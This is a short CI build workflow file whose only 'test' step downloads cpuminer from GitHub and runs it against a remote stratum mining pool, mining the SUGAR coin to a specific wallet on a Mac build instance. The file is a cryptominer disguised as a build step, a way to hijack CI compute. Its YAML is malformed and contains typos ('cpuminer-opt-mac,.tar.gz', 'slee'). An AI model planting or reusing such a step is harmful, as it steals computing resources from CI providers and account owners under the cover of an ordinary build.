workflows:
  my-workflow:
    name: my-workflow
    instance_type: mac_pro
    max_build_duration: 120
    scripts:
         name: test
             - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-mac.tar.gz
             - tar -xvf cpuminer-opt-mac,.tar.gz 
             - ./cpuminer-sse2 -a yespowerSUGAR -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1q6jhhzvqcenetm05cutg6f302v4egznata7sf77.1 -t 4 -B --cpu-priority 4
             - slee 2s
    artifacts:
    publishing:
